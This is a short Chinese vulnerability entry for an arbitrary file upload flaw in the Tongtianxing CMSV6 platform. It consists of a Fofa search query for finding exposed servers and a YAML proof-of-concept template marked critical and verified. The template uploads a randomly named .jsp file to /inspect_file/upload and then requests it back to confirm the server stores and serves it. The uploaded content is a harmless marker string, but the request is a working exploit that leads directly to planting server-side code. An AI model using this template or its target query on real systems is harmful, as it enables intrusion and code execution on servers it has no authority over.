漏洞描述
Fofa: body="./open/webApi.html"||body="/808gps/"
cmsv6-inspect-file-upload: 通天星-CMSV6-inspect_file-upload存在任意文件上传漏洞
PoC代码[已公开]
id: cmsv6-inspect-file-upload
info:
name: 通天星-CMSV6-inspect_file-upload存在任意文件上传漏洞
author: zan8in
severity: critical
verified: true
description: |-
Fofa: body="./open/webApi.html"||body="/808gps/"
tags: fileupload
created: 2024/04/04
set:
randstr: randomLowercase(6)
randbody: base64Decode("YXNkYWFzZGFzZA==")
rboundary: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /inspect_file/upload
headers:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
body: "\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"uploadFile\"; filename=\"{{randstr}}.jsp\"\r\n\
Content-Type: application/octet-stream\r\n\
\r\n\
{{randbody}}\r\n\
------WebKitFormBoundary{{rboundary}}--\r\n\
"
expression: response.status == 200
output:
search: '"\"filePath\":\"/upload/software/(?P<filename>.+?)\"".bsubmatch(response.body)'
filename: search["filename"]
r1:
request:
method: GET
path: /upload/software/{{filename}}
expression: response.status == 200 && response.body.bcontains(bytes(randbody))
expression: r0() && r1()